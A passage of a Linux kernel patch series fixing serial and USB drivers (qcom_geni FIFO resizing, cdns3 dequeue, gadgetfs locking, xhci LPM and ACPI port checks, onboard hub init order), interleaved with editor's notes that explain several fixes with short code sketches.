+-	 * supported baud rate. Make sure we don't end up slightly
+-	 * lower than one of those, as it would make us fall through
+-	 * to a much lower baud rate than we really want.
+-	 */
+-	*baud = port->uartclk / (16 * (quot - 1));
++	*baud = port->uartclk / (16 * quot);
+ }
+ 
+ static int __init atmel_console_setup(struct console *co, char *options)
+diff --git a/drivers/tty/serial/pch_uart.c b/drivers/tty/serial/pch_uart.c
+index b17788cf309b1..83f35b7b0897c 100644
+--- a/drivers/tty/serial/pch_uart.c
++++ b/drivers/tty/serial/pch_uart.c
+@@ -752,7 +752,7 @@ static void pch_dma_tx_complete(void *arg)
+ 	}
+ 	xmit->tail &= UART_XMIT_SIZE - 1;
+ 	async_tx_ack(priv->desc_tx);
+-	dma_unmap_sg(port->dev, sg, priv->orig_nent, DMA_TO_DEVICE);
++	dma_unmap_sg(port->dev, priv->sg_tx_p, priv->orig_nent, DMA_TO_DEVICE);
+ 	priv->tx_dma_use = 0;
+ 	priv->nent = 0;
+ 	priv->orig_nent = 0;
+diff --git a/drivers/tty/serial/qcom_geni_serial.c b/drivers/tty/serial/qcom_geni_serial.c
+index 83b66b73303af..7905935b9f1b4 100644
+--- a/drivers/tty/serial/qcom_geni_serial.c
++++ b/drivers/tty/serial/qcom_geni_serial.c
+@@ -864,9 +864,10 @@ out_unlock:
+ 	return IRQ_HANDLED;
+ }
+ 
+-static void get_tx_fifo_size(struct qcom_geni_serial_port *port)
++static int setup_fifos(struct qcom_geni_serial_port *port)
+ {
+ 	struct uart_port *uport;
++	u32 old_rx_fifo_depth = port->rx_fifo_depth;
+ 
+ 	uport = &port->uport;
+ 	port->tx_fifo_depth = geni_se_get_tx_fifo_depth(&port->se);
+@@ -874,6 +875,16 @@ static void get_tx_fifo_size(struct qcom_geni_serial_port *port)
+ 	port->rx_fifo_depth = geni_se_get_rx_fifo_depth(&port->se);
+ 	uport->fifosize =
+ 		(port->tx_fifo_depth * port->tx_fifo_width) / BITS_PER_BYTE;
++
++	if (port->rx_fifo && (old_rx_fifo_depth != port->rx_fifo_depth) && port->rx_fifo_depth) {
++		port->rx_fifo = devm_krealloc(uport->dev, port->rx_fifo,
++					      port->rx_fifo_depth * sizeof(u32),
++					      GFP_KERNEL);
++		if (!port->rx_fifo)
++			return -ENOMEM;
++	}
++
++	return 0;
+ }
+ 
+ 
+@@ -888,6 +899,7 @@ static int qcom_geni_serial_port_setup(struct uart_port *uport)
+ 	u32 rxstale = DEFAULT_BITS_PER_CHAR * STALE_TIMEOUT;
+ 	u32 proto;
+ 	u32 pin_swap;
++	int ret;
+ 
+ 	proto = geni_se_read_proto(&port->se);
+ 	if (proto != GENI_SE_UART) {
+@@ -897,7 +909,9 @@ static int qcom_geni_serial_port_setup(struct uart_port *uport)
+ 
+ 	qcom_geni_serial_stop_rx(uport);
+ 
+-	get_tx_fifo_size(port);
++	ret = setup_fifos(port);
++	if (ret)
++		return ret;
+ 
+ 	writel(rxstale, uport->membase + SE_UART_RX_STALE_CNT);
+ 
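
[Editor's note] setup_fifos() can now observe a different RX FIFO depth than the one seen at first setup (firmware may reconfigure the wrapper), so the buffer is resized with devm_krealloc(), which preserves the devres lifetime of the original allocation. A minimal sketch, assuming kernel context:

#include <linux/device.h>
#include <linux/slab.h>

static int resize_rx_fifo(struct device *dev, u32 **fifo,
			  u32 old_depth, u32 new_depth)
{
	u32 *buf;

	if (!*fifo || old_depth == new_depth || !new_depth)
		return 0;	/* nothing to do */

	buf = devm_krealloc(dev, *fifo, new_depth * sizeof(u32), GFP_KERNEL);
	if (!buf)
		return -ENOMEM;

	*fifo = buf;
	return 0;
}
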
+diff --git a/drivers/usb/cdns3/cdns3-gadget.c b/drivers/usb/cdns3/cdns3-gadget.c
+index 5adcb349718c3..ccfaebca6faa7 100644
+--- a/drivers/usb/cdns3/cdns3-gadget.c
++++ b/drivers/usb/cdns3/cdns3-gadget.c
+@@ -2614,6 +2614,7 @@ int cdns3_gadget_ep_dequeue(struct usb_ep *ep,
+ 	u8 req_on_hw_ring = 0;
+ 	unsigned long flags;
+ 	int ret = 0;
++	int val;
+ 
+ 	if (!ep || !request || !ep->desc)
+ 		return -EINVAL;
+@@ -2649,6 +2650,13 @@ found:
+ 
+ 	/* Update ring only if removed request is on pending_req_list list */
+ 	if (req_on_hw_ring && link_trb) {
++		/* Stop DMA */
++		writel(EP_CMD_DFLUSH, &priv_dev->regs->ep_cmd);
++
++		/* wait for DFLUSH cleared */
++		readl_poll_timeout_atomic(&priv_dev->regs->ep_cmd, val,
++					  !(val & EP_CMD_DFLUSH), 1, 1000);
++
+ 		link_trb->buffer = cpu_to_le32(TRB_BUFFER(priv_ep->trb_pool_dma +
+ 			((priv_req->end_trb + 1) * TRB_SIZE)));
+ 		link_trb->control = cpu_to_le32((le32_to_cpu(link_trb->control) & TRB_CYCLE) |
+@@ -2660,6 +2668,10 @@ found:
+ 
+ 	cdns3_gadget_giveback(priv_ep, priv_req, -ECONNRESET);
+ 
++	req = cdns3_next_request(&priv_ep->pending_req_list);
++	if (req)
++		cdns3_rearm_transfer(priv_ep, 1);
++
+ not_found:
+ 	spin_unlock_irqrestore(&priv_dev->lock, flags);
+ 	return ret;
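
[Editor's note] The cdns3 dequeue fix stops DMA and then waits for the controller to acknowledge by clearing EP_CMD_DFLUSH before the TRB ring is rewritten. readl_poll_timeout_atomic() is the idiom for such a bounded busy-wait under a spinlock; here is a sketch with an illustrative flag definition:

#include <linux/bits.h>
#include <linux/io.h>
#include <linux/iopoll.h>

#define CMD_FLUSH	BIT(7)	/* illustrative, stands in for EP_CMD_DFLUSH */

static int flush_and_wait(void __iomem *cmd_reg)
{
	u32 val;

	writel(CMD_FLUSH, cmd_reg);

	/*
	 * Poll every 1 us, give up after 1000 us; returns -ETIMEDOUT
	 * if the flag never clears. Safe in atomic context.
	 */
	return readl_poll_timeout_atomic(cmd_reg, val,
					 !(val & CMD_FLUSH), 1, 1000);
}
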
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index bbab424b0d559..0aaaadb02cc69 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -44,6 +44,9 @@
+ #define USB_PRODUCT_USB5534B			0x5534
+ #define USB_VENDOR_CYPRESS			0x04b4
+ #define USB_PRODUCT_CY7C65632			0x6570
++#define USB_VENDOR_TEXAS_INSTRUMENTS		0x0451
++#define USB_PRODUCT_TUSB8041_USB3		0x8140
++#define USB_PRODUCT_TUSB8041_USB2		0x8142
+ #define HUB_QUIRK_CHECK_PORT_AUTOSUSPEND	0x01
+ #define HUB_QUIRK_DISABLE_AUTOSUSPEND		0x02
+ 
+@@ -5798,6 +5801,16 @@ static const struct usb_device_id hub_id_table[] = {
+       .idVendor = USB_VENDOR_GENESYS_LOGIC,
+       .bInterfaceClass = USB_CLASS_HUB,
+       .driver_info = HUB_QUIRK_CHECK_PORT_AUTOSUSPEND},
++    { .match_flags = USB_DEVICE_ID_MATCH_VENDOR
++			| USB_DEVICE_ID_MATCH_PRODUCT,
++      .idVendor = USB_VENDOR_TEXAS_INSTRUMENTS,
++      .idProduct = USB_PRODUCT_TUSB8041_USB2,
++      .driver_info = HUB_QUIRK_DISABLE_AUTOSUSPEND},
++    { .match_flags = USB_DEVICE_ID_MATCH_VENDOR
++			| USB_DEVICE_ID_MATCH_PRODUCT,
++      .idVendor = USB_VENDOR_TEXAS_INSTRUMENTS,
++      .idProduct = USB_PRODUCT_TUSB8041_USB3,
++      .driver_info = HUB_QUIRK_DISABLE_AUTOSUSPEND},
+     { .match_flags = USB_DEVICE_ID_MATCH_DEV_CLASS,
+       .bDeviceClass = USB_CLASS_HUB},
+     { .match_flags = USB_DEVICE_ID_MATCH_INT_CLASS,
+diff --git a/drivers/usb/core/usb-acpi.c b/drivers/usb/core/usb-acpi.c
+index 6d93428432f13..533baa85083c2 100644
+--- a/drivers/usb/core/usb-acpi.c
++++ b/drivers/usb/core/usb-acpi.c
+@@ -37,6 +37,71 @@ bool usb_acpi_power_manageable(struct usb_device *hdev, int index)
+ }
+ EXPORT_SYMBOL_GPL(usb_acpi_power_manageable);
+ 
++#define UUID_USB_CONTROLLER_DSM "ce2ee385-00e6-48cb-9f05-2edb927c4899"
++#define USB_DSM_DISABLE_U1_U2_FOR_PORT	5
++
++/**
++ * usb_acpi_port_lpm_incapable - check if lpm should be disabled for a port.
++ * @hdev: USB device belonging to the usb hub
++ * @index: zero based port index
++ *
++ * Some USB3 ports may not support USB3 link power management U1/U2 states
++ * due to different retimer setup. ACPI provides _DSM method which returns 0x01
++ * if U1 and U2 states should be disabled. Evaluate _DSM with:
++ * Arg0: UUID = ce2ee385-00e6-48cb-9f05-2edb927c4899
++ * Arg1: Revision ID = 0
++ * Arg2: Function Index = 5
++ * Arg3: (empty)
++ *
++ * Return 1 if USB3 port is LPM incapable, negative on error, otherwise 0
++ */
++
++int usb_acpi_port_lpm_incapable(struct usb_device *hdev, int index)
++{
++	union acpi_object *obj;
++	acpi_handle port_handle;
++	int port1 = index + 1;
++	guid_t guid;
++	int ret;
++
++	ret = guid_parse(UUID_USB_CONTROLLER_DSM, &guid);
++	if (ret)
++		return ret;
++
++	port_handle = usb_get_hub_port_acpi_handle(hdev, port1);
++	if (!port_handle) {
++		dev_dbg(&hdev->dev, "port-%d no acpi handle\n", port1);
++		return -ENODEV;
++	}
++
++	if (!acpi_check_dsm(port_handle, &guid, 0,
++			    BIT(USB_DSM_DISABLE_U1_U2_FOR_PORT))) {
++		dev_dbg(&hdev->dev, "port-%d no _DSM function %d\n",
++			port1, USB_DSM_DISABLE_U1_U2_FOR_PORT);
++		return -ENODEV;
++	}
++
++	obj = acpi_evaluate_dsm(port_handle, &guid, 0,
++				USB_DSM_DISABLE_U1_U2_FOR_PORT, NULL);
++
++	if (!obj)
++		return -ENODEV;
++
++	if (obj->type != ACPI_TYPE_INTEGER) {
++		dev_dbg(&hdev->dev, "evaluate port-%d _DSM failed\n", port1);
++		ACPI_FREE(obj);
++		return -EINVAL;
++	}
++
++	if (obj->integer.value == 0x01)
++		ret = 1;
++
++	ACPI_FREE(obj);
++
++	return ret;
++}
++EXPORT_SYMBOL_GPL(usb_acpi_port_lpm_incapable);
++
+ /**
+  * usb_acpi_set_power_state - control usb port's power via acpi power
+  * resource
+diff --git a/drivers/usb/gadget/configfs.c b/drivers/usb/gadget/configfs.c
+index 3a6b4926193ef..7bbc776185469 100644
+--- a/drivers/usb/gadget/configfs.c
++++ b/drivers/usb/gadget/configfs.c
+@@ -392,6 +392,7 @@ static void gadget_info_attr_release(struct config_item *item)
+ 	WARN_ON(!list_empty(&gi->string_list));
+ 	WARN_ON(!list_empty(&gi->available_func));
+ 	kfree(gi->composite.gadget_driver.function);
++	kfree(gi->composite.gadget_driver.driver.name);
+ 	kfree(gi);
+ }
+ 
+@@ -1571,7 +1572,6 @@ static const struct usb_gadget_driver configfs_driver_template = {
+ 	.max_speed	= USB_SPEED_SUPER_PLUS,
+ 	.driver = {
+ 		.owner          = THIS_MODULE,
+-		.name		= "configfs-gadget",
+ 	},
+ 	.match_existing_only = 1,
+ };
+@@ -1622,13 +1622,21 @@ static struct config_group *gadgets_make(
+ 
+ 	gi->composite.gadget_driver = configfs_driver_template;
+ 
++	gi->composite.gadget_driver.driver.name = kasprintf(GFP_KERNEL,
++							    "configfs-gadget.%s", name);
++	if (!gi->composite.gadget_driver.driver.name)
++		goto err;
++
+ 	gi->composite.gadget_driver.function = kstrdup(name, GFP_KERNEL);
+ 	gi->composite.name = gi->composite.gadget_driver.function;
+ 
+ 	if (!gi->composite.gadget_driver.function)
+-		goto err;
++		goto out_free_driver_name;
+ 
+ 	return &gi->group;
++
++out_free_driver_name:
++	kfree(gi->composite.gadget_driver.driver.name);
+ err:
+ 	kfree(gi);
+ 	return ERR_PTR(-ENOMEM);
+diff --git a/drivers/usb/gadget/function/f_ncm.c b/drivers/usb/gadget/function/f_ncm.c
+index c36bcfa0e9b46..424bb3b666dbd 100644
+--- a/drivers/usb/gadget/function/f_ncm.c
++++ b/drivers/usb/gadget/function/f_ncm.c
+@@ -83,7 +83,9 @@ static inline struct f_ncm *func_to_ncm(struct usb_function *f)
+ /* peak (theoretical) bulk transfer rate in bits-per-second */
+ static inline unsigned ncm_bitrate(struct usb_gadget *g)
+ {
+-	if (gadget_is_superspeed(g) && g->speed >= USB_SPEED_SUPER_PLUS)
++	if (!g)
++		return 0;
++	else if (gadget_is_superspeed(g) && g->speed >= USB_SPEED_SUPER_PLUS)
+ 		return 4250000000U;
+ 	else if (gadget_is_superspeed(g) && g->speed == USB_SPEED_SUPER)
+ 		return 3750000000U;
+diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
+index 01c3ead7d1b42..d605bc2e7e8fd 100644
+--- a/drivers/usb/gadget/legacy/inode.c
++++ b/drivers/usb/gadget/legacy/inode.c
+@@ -229,6 +229,7 @@ static void put_ep (struct ep_data *data)
+  */
+ 
+ static const char *CHIP;
++static DEFINE_MUTEX(sb_mutex);		/* Serialize superblock operations */
+ 
+ /*----------------------------------------------------------------------*/
+ 
+@@ -2010,13 +2011,20 @@ gadgetfs_fill_super (struct super_block *sb, struct fs_context *fc)
+ {
+ 	struct inode	*inode;
+ 	struct dev_data	*dev;
++	int		rc;
+ 
+-	if (the_device)
+-		return -ESRCH;
++	mutex_lock(&sb_mutex);
++
++	if (the_device) {
++		rc = -ESRCH;
++		goto Done;
++	}
+ 
+ 	CHIP = usb_get_gadget_udc_name();
+-	if (!CHIP)
+-		return -ENODEV;
++	if (!CHIP) {
++		rc = -ENODEV;
++		goto Done;
++	}
+ 
+ 	/* superblock */
+ 	sb->s_blocksize = PAGE_SIZE;
+@@ -2053,13 +2061,17 @@ gadgetfs_fill_super (struct super_block *sb, struct fs_context *fc)
+ 	 * from binding to a controller.
+ 	 */
+ 	the_device = dev;
+-	return 0;
++	rc = 0;
++	goto Done;
+ 
+-Enomem:
++ Enomem:
+ 	kfree(CHIP);
+ 	CHIP = NULL;
++	rc = -ENOMEM;
+ 
+-	return -ENOMEM;
++ Done:
++	mutex_unlock(&sb_mutex);
++	return rc;
+ }
+ 
+ /* "mount -t gadgetfs path /dev/gadget" ends up here */
+@@ -2081,6 +2093,7 @@ static int gadgetfs_init_fs_context(struct fs_context *fc)
+ static void
+ gadgetfs_kill_sb (struct super_block *sb)
+ {
++	mutex_lock(&sb_mutex);
+ 	kill_litter_super (sb);
+ 	if (the_device) {
+ 		put_dev (the_device);
+@@ -2088,6 +2101,7 @@ gadgetfs_kill_sb (struct super_block *sb)
+ 	}
+ 	kfree(CHIP);
+ 	CHIP = NULL;
++	mutex_unlock(&sb_mutex);
+ }
+ 
+ /*----------------------------------------------------------------------*/
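
[Editor's note] gadgetfs keeps single-instance state (the_device, CHIP) in globals, and fill_super racing kill_sb could free CHIP while the other path still used it; the fix funnels both through one static mutex. The shape of that serialization, reduced to a sketch with illustrative names:

#include <linux/errno.h>
#include <linux/mutex.h>

static DEFINE_MUTEX(sb_mutex);
static void *the_instance;	/* stands in for the_device/CHIP */

static int instance_fill(void *dev)
{
	int rc = 0;

	mutex_lock(&sb_mutex);
	if (the_instance)
		rc = -ESRCH;	/* only one superblock at a time */
	else
		the_instance = dev;
	mutex_unlock(&sb_mutex);

	return rc;
}

static void instance_kill(void)
{
	mutex_lock(&sb_mutex);
	the_instance = NULL;	/* teardown under the same lock */
	mutex_unlock(&sb_mutex);
}
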
+diff --git a/drivers/usb/gadget/legacy/webcam.c b/drivers/usb/gadget/legacy/webcam.c
+index 94e22867da1d0..e9b5846b2322c 100644
+--- a/drivers/usb/gadget/legacy/webcam.c
++++ b/drivers/usb/gadget/legacy/webcam.c
+@@ -293,6 +293,7 @@ static const struct uvc_descriptor_header * const uvc_fs_streaming_cls[] = {
+ 	(const struct uvc_descriptor_header *) &uvc_format_yuv,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_yuv_360p,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_yuv_720p,
++	(const struct uvc_descriptor_header *) &uvc_color_matching,
+ 	(const struct uvc_descriptor_header *) &uvc_format_mjpg,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_mjpg_360p,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_mjpg_720p,
+@@ -305,6 +306,7 @@ static const struct uvc_descriptor_header * const uvc_hs_streaming_cls[] = {
+ 	(const struct uvc_descriptor_header *) &uvc_format_yuv,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_yuv_360p,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_yuv_720p,
++	(const struct uvc_descriptor_header *) &uvc_color_matching,
+ 	(const struct uvc_descriptor_header *) &uvc_format_mjpg,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_mjpg_360p,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_mjpg_720p,
+@@ -317,6 +319,7 @@ static const struct uvc_descriptor_header * const uvc_ss_streaming_cls[] = {
+ 	(const struct uvc_descriptor_header *) &uvc_format_yuv,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_yuv_360p,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_yuv_720p,
++	(const struct uvc_descriptor_header *) &uvc_color_matching,
+ 	(const struct uvc_descriptor_header *) &uvc_format_mjpg,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_mjpg_360p,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_mjpg_720p,
+diff --git a/drivers/usb/host/ehci-fsl.c b/drivers/usb/host/ehci-fsl.c
+index 9cea785934e59..38d06e5abfbb3 100644
+--- a/drivers/usb/host/ehci-fsl.c
++++ b/drivers/usb/host/ehci-fsl.c
+@@ -29,7 +29,7 @@
+ #include "ehci-fsl.h"
+ 
+ #define DRIVER_DESC "Freescale EHCI Host controller driver"
+-#define DRV_NAME "ehci-fsl"
++#define DRV_NAME "fsl-ehci"
+ 
+ static struct hc_driver __read_mostly fsl_ehci_hc_driver;
+ 
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index f98cf30a3c1a5..232e175e4e964 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -78,9 +78,12 @@ static const char hcd_name[] = "xhci_hcd";
+ static struct hc_driver __read_mostly xhci_pci_hc_driver;
+ 
+ static int xhci_pci_setup(struct usb_hcd *hcd);
++static int xhci_pci_update_hub_device(struct usb_hcd *hcd, struct usb_device *hdev,
++				      struct usb_tt *tt, gfp_t mem_flags);
+ 
+ static const struct xhci_driver_overrides xhci_pci_overrides __initconst = {
+ 	.reset = xhci_pci_setup,
++	.update_hub_device = xhci_pci_update_hub_device,
+ };
+ 
+ /* called after powerup, by probe or system-pm "wakeup" */
+@@ -352,8 +355,38 @@ static void xhci_pme_acpi_rtd3_enable(struct pci_dev *dev)
+ 				NULL);
+ 	ACPI_FREE(obj);
+ }
++
++static void xhci_find_lpm_incapable_ports(struct usb_hcd *hcd, struct usb_device *hdev)
++{
++	struct xhci_hcd	*xhci = hcd_to_xhci(hcd);
++	struct xhci_hub *rhub = &xhci->usb3_rhub;
++	int ret;
++	int i;
++
++	/* This is not the usb3 roothub we are looking for */
++	if (hcd != rhub->hcd)
++		return;
++
++	if (hdev->maxchild > rhub->num_ports) {
++		dev_err(&hdev->dev, "USB3 roothub port number mismatch\n");
++		return;
++	}
++
++	for (i = 0; i < hdev->maxchild; i++) {
++		ret = usb_acpi_port_lpm_incapable(hdev, i);
++
++		dev_dbg(&hdev->dev, "port-%d disable U1/U2 _DSM: %d\n", i + 1, ret);
++
++		if (ret >= 0) {
++			rhub->ports[i]->lpm_incapable = ret;
++			continue;
++		}
++	}
++}
++
+ #else
+ static void xhci_pme_acpi_rtd3_enable(struct pci_dev *dev) { }
++static void xhci_find_lpm_incapable_ports(struct usb_hcd *hcd, struct usb_device *hdev) { }
+ #endif /* CONFIG_ACPI */
+ 
+ /* called during probe() after chip reset completes */
+@@ -386,6 +419,16 @@ static int xhci_pci_setup(struct usb_hcd *hcd)
+ 	return xhci_pci_reinit(xhci, pdev);
+ }
+ 
++static int xhci_pci_update_hub_device(struct usb_hcd *hcd, struct usb_device *hdev,
++				      struct usb_tt *tt, gfp_t mem_flags)
++{
++	/* Check if acpi claims some USB3 roothub ports are lpm incapable */
++	if (!hdev->parent)
++		xhci_find_lpm_incapable_ports(hcd, hdev);
++
++	return xhci_update_hub_device(hcd, hdev, tt, mem_flags);
++}
++
+ /*
+  * We need to register our own PCI probe function (instead of the USB core's
+  * function) in order to create a second roothub under xHCI.
+@@ -455,6 +498,8 @@ static int xhci_pci_probe(struct pci_dev *dev, const struct pci_device_id *id)
+ 	if (xhci->quirks & XHCI_DEFAULT_PM_RUNTIME_ALLOW)
+ 		pm_runtime_allow(&dev->dev);
+ 
++	dma_set_max_seg_size(&dev->dev, UINT_MAX);
++
+ 	return 0;
+ 
+ put_usb3_hcd:
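
[Editor's note] The xhci changes add an .update_hub_device override so the PCI glue can record LPM-incapable root ports (via the ACPI _DSM) and then delegate to the now-exported core xhci_update_hub_device(). The wrap-and-delegate shape, sketched with platform_check_ports() as a hypothetical hook:

#include <linux/usb.h>
#include <linux/usb/hcd.h>

static void platform_check_ports(struct usb_hcd *hcd,
				 struct usb_device *hdev);	/* hypothetical */

int xhci_update_hub_device(struct usb_hcd *hcd, struct usb_device *hdev,
			   struct usb_tt *tt, gfp_t mem_flags);

static int my_update_hub_device(struct usb_hcd *hcd, struct usb_device *hdev,
				struct usb_tt *tt, gfp_t mem_flags)
{
	/* Root hub only: a parentless udev is the roothub itself. */
	if (!hdev->parent)
		platform_check_ports(hcd, hdev);

	/* Always fall through to the core implementation. */
	return xhci_update_hub_device(hcd, hdev, tt, mem_flags);
}
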
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index 343709af4c16f..dce02d0aad8d0 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -1170,7 +1170,10 @@ static void xhci_kill_endpoint_urbs(struct xhci_hcd *xhci,
+ 	struct xhci_virt_ep *ep;
+ 	struct xhci_ring *ring;
+ 
+-	ep = &xhci->devs[slot_id]->eps[ep_index];
++	ep = xhci_get_virt_ep(xhci, slot_id, ep_index);
++	if (!ep)
++		return;
++
+ 	if ((ep->ep_state & EP_HAS_STREAMS) ||
+ 			(ep->ep_state & EP_GETTING_NO_STREAMS)) {
+ 		int stream_id;
+diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c
+index 79d7931c048a8..2b280beb00115 100644
+--- a/drivers/usb/host/xhci.c
++++ b/drivers/usb/host/xhci.c
+@@ -3974,6 +3974,7 @@ static void xhci_free_dev(struct usb_hcd *hcd, struct usb_device *udev)
+ 	struct xhci_hcd *xhci = hcd_to_xhci(hcd);
+ 	struct xhci_virt_device *virt_dev;
+ 	struct xhci_slot_ctx *slot_ctx;
++	unsigned long flags;
+ 	int i, ret;
+ 
+ 	/*
+@@ -4000,7 +4001,11 @@ static void xhci_free_dev(struct usb_hcd *hcd, struct usb_device *udev)
+ 		virt_dev->eps[i].ep_state &= ~EP_STOP_CMD_PENDING;
+ 	virt_dev->udev = NULL;
+ 	xhci_disable_slot(xhci, udev->slot_id);
++
++	spin_lock_irqsave(&xhci->lock, flags);
+ 	xhci_free_virt_device(xhci, udev->slot_id);
++	spin_unlock_irqrestore(&xhci->lock, flags);
++
+ }
+ 
+ int xhci_disable_slot(struct xhci_hcd *xhci, u32 slot_id)
+@@ -5044,6 +5049,7 @@ static int xhci_enable_usb3_lpm_timeout(struct usb_hcd *hcd,
+ 			struct usb_device *udev, enum usb3_link_state state)
+ {
+ 	struct xhci_hcd	*xhci;
++	struct xhci_port *port;
+ 	u16 hub_encoded_timeout;
+ 	int mel;
+ 	int ret;
+@@ -5060,6 +5066,13 @@ static int xhci_enable_usb3_lpm_timeout(struct usb_hcd *hcd,
+ 	if (xhci_check_tier_policy(xhci, udev, state) < 0)
+ 		return USB3_LPM_DISABLED;
+ 
++	/* If connected to root port then check port can handle lpm */
++	if (udev->parent && !udev->parent->parent) {
++		port = xhci->usb3_rhub.ports[udev->portnum - 1];
++		if (port->lpm_incapable)
++			return USB3_LPM_DISABLED;
++	}
++
+ 	hub_encoded_timeout = xhci_calculate_lpm_timeout(hcd, udev, state);
+ 	mel = calculate_max_exit_latency(udev, state, hub_encoded_timeout);
+ 	if (mel < 0) {
+@@ -5119,7 +5132,7 @@ static int xhci_disable_usb3_lpm_timeout(struct usb_hcd *hcd,
+ /* Once a hub descriptor is fetched for a device, we need to update the xHC's
+  * internal data structures for the device.
+  */
+-static int xhci_update_hub_device(struct usb_hcd *hcd, struct usb_device *hdev,
++int xhci_update_hub_device(struct usb_hcd *hcd, struct usb_device *hdev,
+ 			struct usb_tt *tt, gfp_t mem_flags)
+ {
+ 	struct xhci_hcd *xhci = hcd_to_xhci(hcd);
+@@ -5219,6 +5232,7 @@ static int xhci_update_hub_device(struct usb_hcd *hcd, struct usb_device *hdev,
+ 	xhci_free_command(xhci, config_cmd);
+ 	return ret;
+ }
++EXPORT_SYMBOL_GPL(xhci_update_hub_device);
+ 
+ static int xhci_get_frame(struct usb_hcd *hcd)
+ {
+@@ -5502,6 +5516,8 @@ void xhci_init_driver(struct hc_driver *drv,
+ 			drv->check_bandwidth = over->check_bandwidth;
+ 		if (over->reset_bandwidth)
+ 			drv->reset_bandwidth = over->reset_bandwidth;
++		if (over->update_hub_device)
++			drv->update_hub_device = over->update_hub_device;
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(xhci_init_driver);
+diff --git a/drivers/usb/host/xhci.h b/drivers/usb/host/xhci.h
+index c9f06c5e4e9d2..dcee7f3207add 100644
+--- a/drivers/usb/host/xhci.h
++++ b/drivers/usb/host/xhci.h
+@@ -1735,6 +1735,7 @@ struct xhci_port {
+ 	int			hcd_portnum;
+ 	struct xhci_hub		*rhub;
+ 	struct xhci_port_cap	*port_cap;
++	unsigned int		lpm_incapable:1;
+ };
+ 
+ struct xhci_hub {
+@@ -1943,6 +1944,8 @@ struct xhci_driver_overrides {
+ 			     struct usb_host_endpoint *ep);
+ 	int (*check_bandwidth)(struct usb_hcd *, struct usb_device *);
+ 	void (*reset_bandwidth)(struct usb_hcd *, struct usb_device *);
++	int (*update_hub_device)(struct usb_hcd *hcd, struct usb_device *hdev,
++			    struct usb_tt *tt, gfp_t mem_flags);
+ };
+ 
+ #define	XHCI_CFC_DELAY		10
+@@ -2122,6 +2125,8 @@ int xhci_drop_endpoint(struct usb_hcd *hcd, struct usb_device *udev,
+ 		       struct usb_host_endpoint *ep);
+ int xhci_check_bandwidth(struct usb_hcd *hcd, struct usb_device *udev);
+ void xhci_reset_bandwidth(struct usb_hcd *hcd, struct usb_device *udev);
++int xhci_update_hub_device(struct usb_hcd *hcd, struct usb_device *hdev,
++			   struct usb_tt *tt, gfp_t mem_flags);
+ int xhci_disable_slot(struct xhci_hcd *xhci, u32 slot_id);
+ int xhci_ext_cap_init(struct xhci_hcd *xhci);
+ 
+diff --git a/drivers/usb/misc/iowarrior.c b/drivers/usb/misc/iowarrior.c
+index 988a8c02e7e24..b421f13260875 100644
+--- a/drivers/usb/misc/iowarrior.c
++++ b/drivers/usb/misc/iowarrior.c
+@@ -814,7 +814,7 @@ static int iowarrior_probe(struct usb_interface *interface,
+ 			break;
+ 
+ 		case USB_DEVICE_ID_CODEMERCS_IOW100:
+-			dev->report_size = 13;
++			dev->report_size = 12;
+ 			break;
+ 		}
+ 	}
+diff --git a/drivers/usb/misc/onboard_usb_hub.c b/drivers/usb/misc/onboard_usb_hub.c
+index d63c63942af1b..044e75ad4d20c 100644
+--- a/drivers/usb/misc/onboard_usb_hub.c
++++ b/drivers/usb/misc/onboard_usb_hub.c
+@@ -27,7 +27,10 @@
+ 
+ #include "onboard_usb_hub.h"
+ 
++static void onboard_hub_attach_usb_driver(struct work_struct *work);
++
+ static struct usb_device_driver onboard_hub_usbdev_driver;
++static DECLARE_WORK(attach_usb_driver_work, onboard_hub_attach_usb_driver);
+ 
+ /************************** Platform driver **************************/
+ 
+@@ -45,7 +48,6 @@ struct onboard_hub {
+ 	bool is_powered_on;
+ 	bool going_away;
+ 	struct list_head udev_list;
+-	struct work_struct attach_usb_driver_work;
+ 	struct mutex lock;
+ };
+ 
+@@ -271,8 +273,7 @@ static int onboard_hub_probe(struct platform_device *pdev)
+ 	 * This needs to be done deferred to avoid self-deadlocks on systems
+ 	 * with nested onboard hubs.
+ 	 */
+-	INIT_WORK(&hub->attach_usb_driver_work, onboard_hub_attach_usb_driver);
+-	schedule_work(&hub->attach_usb_driver_work);
++	schedule_work(&attach_usb_driver_work);
+ 
+ 	return 0;
+ }
+@@ -285,9 +286,6 @@ static int onboard_hub_remove(struct platform_device *pdev)
+ 
+ 	hub->going_away = true;
+ 
+-	if (&hub->attach_usb_driver_work != current_work())
+-		cancel_work_sync(&hub->attach_usb_driver_work);
+-
+ 	mutex_lock(&hub->lock);
+ 
+ 	/* unbind the USB devices to avoid dangling references to this device */
+@@ -431,13 +429,13 @@ static int __init onboard_hub_init(void)
+ {
+ 	int ret;
+ 
+-	ret = platform_driver_register(&onboard_hub_driver);
++	ret = usb_register_device_driver(&onboard_hub_usbdev_driver, THIS_MODULE);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = usb_register_device_driver(&onboard_hub_usbdev_driver, THIS_MODULE);
++	ret = platform_driver_register(&onboard_hub_driver);
+ 	if (ret)
+-		platform_driver_unregister(&onboard_hub_driver);
++		usb_deregister_device_driver(&onboard_hub_usbdev_driver);
+ 
+ 	return ret;
+ }
